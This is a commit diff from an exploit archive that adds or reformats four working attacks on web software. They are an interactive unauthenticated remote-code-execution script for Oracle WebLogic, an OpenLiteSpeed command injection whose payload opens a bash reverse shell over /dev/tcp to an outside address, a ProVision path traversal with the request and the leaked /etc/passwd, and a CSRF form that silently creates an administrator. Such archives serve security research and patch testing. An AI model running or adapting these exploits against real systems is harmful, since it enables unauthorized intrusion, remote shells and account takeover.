DB: 2021-01-28

4 changes to exploits/shellcodes Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) STVS ProVision 5.9.10 - File Disclosure (Authenticated) STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
2021-01-28 05:01:55 +00:00 · 2021-01-28 05:01:55 +00:00 · f268b6f221
commit f268b6f221
parent 9847785d4c
5 changed files with 272 additions and 47 deletions
--- a/exploits/java/webapps/49479.py
+++ b/exploits/java/webapps/49479.py
@ -1,6 +1,6 @@
 # Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
-# Google Dork: inurl:\\\"/console/login/LoginForm.jsp\\\"
-# Date: 25/1/2021
+# Google Dork: inurl:"/console/login/LoginForm.jsp"
+# Date: 01/26/2021
 # Exploit Author: CHackA0101
 # Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
 # Version: Oracle WebLogic Server, version 12.2.1.0
@ -15,77 +15,74 @@
 import requests
 import argparse
 import http.client
-http.client.HTTPConnection._http_vsn = 10
-http.client.HTTPConnection._http_vsn_str = \\\'HTTP/1.0\\\'
+http.client.HTTPConnection._http_vsn=10
+http.client.HTTPConnection._http_vsn_str='HTTP/1.0'
+parse=argparse.ArgumentParser()
+parse.add_argument('-u','--url',help='url')
+args=parse.parse_args()

-parse = argparse.ArgumentParser()
-parse.add_argument(\\\'-u\\\', \\\'--url\\\', help=\\\'url\\\')
-args = parse.parse_args()
-
-proxies = {\\\'http\\\' : \\\'127.0.0.1:8080\\\'}
-cmd_ = \\\"\\\"
+proxies={'http':'127.0.0.1:8080'}
+cmd_=""

 # Headers
 headers = {
-	\\\"User-Agent\\\": \\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\",
-	\\\"Accept\\\": \\\"application/json, text/plain, */*\\\",
-	\\\"Accept-Language\\\": \\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\",
-	\\\"Accept-Encoding\\\": \\\"gzip, deflate\\\",
-	\\\"Upgrade-Insecure-Requests\\\": \\\"1\\\",
-	\\\"Content-Type\\\": \\\"application/x-www-form-urlencoded\\\",
-	\\\"Cache-Control\\\": \\\"max-age=0\\\",
-	\\\"Connection\\\": \\\"close\\\"
+	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0",
+	"Accept":"application/json,text/plain,*/*",
+	"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+	"Accept-Encoding":"gzip,deflate",
+	"Upgrade-Insecure-Requests":"1",
+	"Content-Type":"application/x-www-form-urlencoded",
+	"Cache-Control":"max-age=0",
+	"Connection":"close"
 }

 # Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
-url = args.url + \\\"\\\"\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec();\\\");\\\"\\\"\\\"
-url_ = args.url + \\\"/console/images/%252E%252E%252Fconsole.portal\\\"
+url=args.url+"""/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");"""
+url_=args.url+"/console/images/%252E%252E%252Fconsole.portal"

-form_data_ = \\\"\\\"\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
+form_data_="""_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread();
 weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
-java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\"connectionHandler\\\");
+java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
 field.setAccessible(true);
 Object obj = field.get(adapter);
-weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\"getServletRequest\\\").invoke(obj);
-String cmd = req.getHeader(\\\"cmd\\\");
-String[] cmds = System.getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"window\\\") ? new String[]{\\\"cmd.exe\\\", \\\"/c\\\", cmd} : new String[]{\\\"/bin/sh\\\", \\\"-c\\\", cmd};
+weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
+String cmd = req.getHeader("cmd");
+String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd};
 if (cmd != null) {
-    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\"\\\\\\\\\\\\A\\\").next();
-    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\"getResponse\\\").invoke(req);
+    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next();
+    weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
-    res.getWriter().write(\\\"\\\");
-}executeThread.interrupt();
-\\\");\\\"\\\"\\\"
+    res.getWriter().write("");}executeThread.interrupt();");"""

 #data_ = parse.urlencode(form_data_)
-results1 = requests.get(url, headers=headers)
+results1=requests.get(url,headers=headers)

-if results1.status_code == 200:
-	print(\\\"(Load Headers... \\\\n\\\")
-	print(\\\"(Data urlencode... \\\\n\\\")
-	print(\\\"(Execute exploit... \\\\n\\\")
-	print(\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\n\\\")
+if results1.status_code==200:
+	print("(Load Headers...)\n")
+	print("(Data urlencode...)\n")
+	print("(Execute exploit...)\n")
+	print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n")
 	while True:
-		cmd_test = input(\\\"(CHackA0101GNU/Linux)$ \\\")
-		if cmd_test == \\\"exit\\\":
+		cmd_test = input("(CHackA0101GNU/Linux)$ ")
+		if cmd_test=="exit":
 			break
 		else:
 			try:
 				cmd_ = cmd_test
 				headers = {
-					\\\'cmd\\\': cmd_,
-					\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\',
-					\\\'User-Agent\\\': \\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\',
-					\\\'Accept\\\': \\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\',
-					\\\'Connection\\\': \\\'close\\\',
-					\\\'Accept-Encoding\\\': \\\'gzip, deflate\\\',
-					\\\'Content-Length\\\': \\\'1244\\\',
-					\\\'Content-Type\\\': \\\'application/x-www-form-urlencoded\\\'
+					'cmd': cmd_,
+					'Content-Type':'application/x-www-form-urlencoded',
+					'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
+					'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+					'Connection':'close',
+					'Accept-Encoding':'gzip,deflate',
+					'Content-Length':'1244',
+					'Content-Type':'application/x-www-form-urlencoded'
 				}
 				results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
 				print(results_)
 			except:
 				pass
 else:
-	print(\\\"(CHackA0101GNU/Linux)$ Fail.\\\\n\\\")
+	print("(CHackA0101-GNU/Linux)$ Fail.\n")
--- a/exploits/multiple/webapps/49483.txt
+++ b/exploits/multiple/webapps/49483.txt
@ -0,0 +1,38 @@
+# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
+# Date: 26/1/2021
+# Exploit Author: cmOs - SunCSR
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.8
+# Tested on Windows 10
+
+
+Step 1: Log in to the dashboard using the Administrator account.
+Step 2 : Access Server Configuration > External App > Command
+Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
+Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
+Step 5: Graceful Restart
+
+[POC]
+
+POST /view/confMgr.php HTTP/1.1
+Host: target:7080
+Connection: close
+Content-Length: 579
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://target:7080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://target:7080/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
+litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;
+LSPA37FE0C43B84483E0=excYiZbpUS4%3D
+
+name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
--- a/exploits/ruby/webapps/49481.txt
+++ b/exploits/ruby/webapps/49481.txt
@ -0,0 +1,121 @@
+# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated)
+# Date: 19.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.stvs.ch
+
+
+STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
+
+
+Vendor: STVS SA
+Product web page: http://www.stvs.ch
+Platform: Ruby
+Affected version:  5.9.10 (build 2885-3a8219a)
+                   5.9.9 (build 2882-7c3b787)
+                   5.9.7 (build 2871-a450938)
+                   5.9.1 (build 2771-1bbed11)
+                   5.9.0 (build 2701-6123026)
+                   5.8.6 (build 2557-84726f7)
+                   5.7
+                   5.6
+                   5.5
+
+Summary: STVS is a Swiss company specializing in development of
+software for digital video recording for surveillance cameras
+as well as the establishment of powerful and user-friendly IP
+video surveillance networks.
+
+Desc: The NVR software ProVision suffers from an authenticated
+arbitrary file disclosure vulnerability. Input passed through
+the files parameter in archive download script (archive.rb) is
+not properly verified before being used to download files. This
+can be exploited to disclose the contents of arbitrary and sensitive
+files.
+
+Tested on: Ubuntu 14.04.3
+           nginx/1.12.1
+           nginx/1.4.6
+           nginx/1.1.19
+           nginx/0.7.65
+           nginx/0.3.61
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5623
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php
+
+19.01.2021
+
+--
+
+
+#1 LFI Prober (FP):
+-------------------
+
+GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+Host: 192.168.1.17
+Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80"
+Accept: application/json, text/javascript, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Origin: http://192.168.1.17
+Referer: http://192.168.1.17/archive
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: last_stream=1; __flash__info=
+Connection: close
+
+HTTP/1.1 500 Not Found
+Server: nginx/1.4.6 (Ubuntu)
+Date: Mon, 18 Jan 2021 23:23:30 GMT
+Content-Type: text/html
+Content-Length: 2727
+Connection: close
+
+<h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3><ul><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li><li>(eval):27:in `send'</li><li>(eval):27:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li><li>/usr/local/bin/provision_server:69:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li><li>/usr/local/bin/provision_server:63:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li><li>/usr/local/bin/provision_server:62:in `new'</li><li>/usr/local/bin/provision_server:62</li></ul>
+
+
+#2 LFI Prober (Verified):
+-------------------------
+
+$ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd"
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+libuuid:x:100:101::/var/lib/libuuid:
+syslog:x:101:104::/home/syslog:/bin/false
+mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
+provision:x:999:107::/srv/provision/provision:/bin/bash
+stvs:x:1000:100::/home/stvs:/bin/bash
+usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
+ntp:x:104:108::/home/ntp:/bin/false
+messagebus:x:105:110::/var/run/dbus:/bin/false
+sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
+statd:x:107:65534::/var/lib/nfs:/bin/false
+
+
+--
+Errno::ENOENT No such file or directory - /var/www/index.html:
+
+    /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'
+    /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'
+    /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'
--- a/exploits/ruby/webapps/49482.html
+++ b/exploits/ruby/webapps/49482.html
@ -0,0 +1,66 @@
+# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
+# Date: 19.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.stvs.ch
+
+STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)
+
+
+Vendor: STVS SA
+Product web page: http://www.stvs.ch
+Platform: Ruby
+Affected version:  5.9.10 (build 2885-3a8219a)
+                   5.9.9 (build 2882-7c3b787)
+                   5.9.7 (build 2871-a450938)
+                   5.9.1 (build 2771-1bbed11)
+                   5.9.0 (build 2701-6123026)
+                   5.8.6 (build 2557-84726f7)
+                   5.7
+                   5.6
+                   5.5
+
+Summary: STVS is a Swiss company specializing in development of
+software for digital video recording for surveillance cameras
+as well as the establishment of powerful and user-friendly IP
+video surveillance networks.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Ubuntu 14.04.3
+           nginx/1.12.1
+           nginx/1.4.6
+           nginx/1.1.19
+           nginx/0.7.65
+           nginx/0.3.61
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5625
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php
+
+19.01.2021
+
+--
+
+
+<html>
+  <body>
+    <form action="http://192.168.1.17/users/create" method="POST">
+      <input type="hidden" name="login" value="testingus" />
+      <input type="hidden" name="password" value="testingus" />
+      <input type="hidden" name="confirm&#95;password" value="testingus" />
+      <input type="hidden" name="email" value="test&#64;test&#46;tld" />
+      <input type="hidden" name="role&#95;id" value="1" />
+      <input type="hidden" name="never&#95;expire" value="on" />
+      <input type="hidden" name="disabled&#95;acc" value="false" />
+      <input type="submit" value="Forge request" />
+    </form>
+  </body>
+</html>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43674,3 +43674,6 @@ id,file,description,date,author,type,platform,port
 49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
 49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
 49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
+49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
+49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
+49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,